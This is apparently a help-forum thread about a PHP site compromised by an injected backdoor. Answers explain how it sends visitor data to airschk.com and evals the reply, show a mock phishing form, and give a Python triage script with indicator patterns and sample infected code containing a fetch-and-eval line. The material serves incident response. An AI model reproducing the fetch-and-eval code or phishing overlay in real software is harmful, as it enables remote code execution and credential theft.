My website has been taken down by hackers, and looking through the site there is a load of additional stuff at the top of each PHP file.
Each file now starts with:
GLOBAL $wehaveitagain;
if($wehaveitagain != 1)
{
Full addition here
The database seems to be fine, so I am curious: what is the likely path of entry that allowed them to edit my files?
You're not the first to get hit by airschk.
The exploit is based around a POST request with a variable prgetxr being set.
If it isn't set (and likely, in normal use of the site, it won't be), it cycles through that IP hash-map mynetsxx and, if it finds that the requesting IP is in a network that matches (to understand "network" you have to understand how networking works, but these are basically local guys, not remote), it calls rewrioutclbkxxx.
You can manually request that function call by sending a GET request where a GET variable showmeallpls is true.
rewrioutclbkxxx is passed to output-buffer start, so it's likely going to screw with all the data BEFORE it's sent, but AFTER your normal code is done doing its thing.
BEWARE, LIKELY A MALICIOUS DOMAIN BELOW DON'T GO UNLESS YOU KNOW WHAT YOU'RE DOING.
It's going to pull data from hxxp://airschk.com/clk (I've censored the HTTP in that URL). It wants to get a bunch of data, so it sends a string that contains: user-agent (i.e. the user's browser), their IP address, what URL they've requested, what page they came from, and the ID code 4dae82ac67843a194c000ca1, which is likely something they've set up to identify your server.
So in short, the code sends a whole whack of user information off to airschk, and it returns some data. That data gets tossed into an EVAL. Boom, your site is pwn'd.
EVAL will evaluate any string in there as if it's php. They can delete everything, edit everything, change anything they want, perhaps even get shell access. You're basically pwnt.
Now wait, what if we did send that POST request way back there? Oh sneaky, they've gone to a URL at toolbarqueries.google.com, but the URL tries to jack up Google page rank for the URL (blackhat SEO; you can get banned from Google for this, but in the short term they get more hits).
airschk, prgetxr, and GET requests of showmeallpls.
Since they can edit the output stream of your files on demand and know the user-agent as well as IP address, they probably can track your users. Let's say you're a bank, and this is your login HTML:
<form method="post" action="./login.php">
<input name="BankAccountNumber" />
<input name="Password" />
</form>
Okay, the output-buffer rewrite can actually keep everything exactly the way it is and do this to your users:
<p>We have noticed high activity on your account, please provide additional information to help secure your account.</p>
<form method="post" action="http://example.com/hax/lulz">
<input name="CreditCardNumber" />
<input name="SocialSecurityNumber" />
<input name="FullName" />
<input name="DateOfBirth" />
<input name="HomeAddress" />
<input name="BankAccountNumber" />
<input name="Password" />
<input name="prgetxr" />
</form>
Well, I'd say your whole server is never to be trusted again. Nuke the damn thing from orbit and re-install a backup.
Don't have a backup? What's wrong with you? Put a backup in place after you've hired someone to comb through every line of code, every database record, and every last file installed on your system, because more exploits could be anywhere. Nuke the damn thing and install a backup.
Next, set chmod permissions so these files cannot be edited by anyone other than an account that is NOT the web account. You need to understand Unix security.
Next, remove that damn eval from any file that runs on your server (maybe even configure suhosin). If you have any running code that depends on it, you're doing it wrong anyway. Remove it. You need to.
A band-aid measure will be to block the hacker domain, but this is totally worthless past 12 hours; they can just move elsewhere, and likely have by now.
I can't tell what path of attack they took to do this, so that's a whole different investigation and not really a question for SO.
Security isn't trivial or easy or quick to learn. Don't play games, pay someone who knows what they're doing.
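As an added example (not code from the original question or either answer), here is a small Python triage script for the cleanup the answer describes. It does two things: it scans PHP sources for the indicators the answer names ($wehaveitagain, rewrioutclbkxxx, mynetsxx, airschk.com, an ob_start() with a callback, and any eval()), and it scans combined-format web access-log lines for the showmeallpls/prgetxr triggers, then pivots to every request from the IPs that sent them. The PHP file contents and log lines are constructed samples, not files from the victim's server, and nothing is fetched from airschk.com. Since the answer says prgetxr arrives as a POST variable and POST bodies are not written to a standard access log, the log pass only catches it in a query string; the pivot on trigger IPs is what surfaces their other POSTs.

```python
import re

# Constructed sample PHP files modelled on the injection the question describes
# (the prologue from the question plus a plausible callback body). Not real files.
SAMPLE_FILES = {
    "index.php": (
        "<?php\nGLOBAL $wehaveitagain;\nif($wehaveitagain != 1)\n{\n"
        "$wehaveitagain = 1;\nob_start('rewrioutclbkxxx');\n}\necho 'hello';\n"
    ),
    "clean.php": "<?php\necho 'hello';\n",
    "lib.php": (
        "<?php\nfunction rewrioutclbkxxx($b){ "
        "$d = file_get_contents('http://airschk.com/clk?x=1'); eval($d); return $b; }\n"
    ),
}

# Indicators taken from the answer. ob_start with ANY callback is flagged because
# that is the hook used here; benign callbacks (e.g. ob_gzhandler) need manual review.
INDICATORS = {
    "wehaveitagain": re.compile(r"\$wehaveitagain\b"),
    "prgetxr": re.compile(r"prgetxr"),
    "showmeallpls": re.compile(r"showmeallpls"),
    "mynetsxx": re.compile(r"mynetsxx"),
    "rewrioutclbkxxx": re.compile(r"rewrioutclbkxxx"),
    "airschk": re.compile(r"airschk\.com"),
    "ob_start_callback": re.compile(r"ob_start\s*\(\s*['\"]?\w+"),
    "eval": re.compile(r"\beval\s*\("),
}


def scan_php(contents):
    """Map each file name to the sorted list of indicator names found in it."""
    hits = {}
    for name, src in contents.items():
        found = sorted(k for k, rx in INDICATORS.items() if rx.search(src))
        if found:
            hits[name] = found
    return hits


# Apache/nginx "combined" log format. Constructed sample lines; the IPs are
# documentation ranges, not real attacker addresses.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<ref>[^"]*)" "(?P<ua>[^"]*)"'
)

SAMPLE_LOG = """\
203.0.113.5 - - [10/May/2011:13:55:36 +0000] "GET /index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.7 - - [10/May/2011:13:56:01 +0000] "GET /index.php?showmeallpls=1 HTTP/1.1" 200 9001 "-" "curl/7.21"
198.51.100.7 - - [10/May/2011:13:57:12 +0000] "POST /index.php HTTP/1.1" 200 77 "-" "curl/7.21"
203.0.113.9 - - [10/May/2011:14:01:40 +0000] "GET /about.php HTTP/1.1" 200 300 "http://example.org/" "Mozilla/5.0"
"""

TRIGGERS = ("showmeallpls", "prgetxr")


def parse_log(log_text):
    """Parse combined-format lines into dicts; lines that do not match are skipped."""
    return [m.groupdict() for m in map(LOG_RE.match, log_text.splitlines()) if m]


def trigger_requests(log_text):
    """Requests whose request line carries one of the backdoor's trigger names."""
    return [
        (e["ip"], e["method"], e["path"])
        for e in parse_log(log_text)
        if any(t in e["path"] for t in TRIGGERS)
    ]


def pivot_on_trigger_ips(log_text):
    """For every IP that sent a trigger request, list all of that IP's requests,
    so POSTs (whose bodies the log does not record) from the same source show up."""
    entries = parse_log(log_text)
    trigger_ips = {e["ip"] for e in entries if any(t in e["path"] for t in TRIGGERS)}
    return {
        ip: [(e["method"], e["path"]) for e in entries if e["ip"] == ip]
        for ip in sorted(trigger_ips)
    }


if __name__ == "__main__":
    for fname, inds in scan_php(SAMPLE_FILES).items():
        print(f"{fname}: {', '.join(inds)}")
    for ip, reqs in pivot_on_trigger_ips(SAMPLE_LOG).items():
        print(f"{ip}: {reqs}")
```

Run it against the real document root and access logs by replacing the constructed samples with file reads; any file the script flags for ob_start_callback or eval still needs a human to read it, because a flag is a lead, not proof, and the answer's point stands that the only safe outcome is a rebuild from a known-clean backup.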
I do not know, but the best way to find out is to see what ports are open on your machine. The website that I use frequently to test firewalls etc. is http://www.auditmypc.com/firewall-test.asp as it gives you a perspective from the outside world.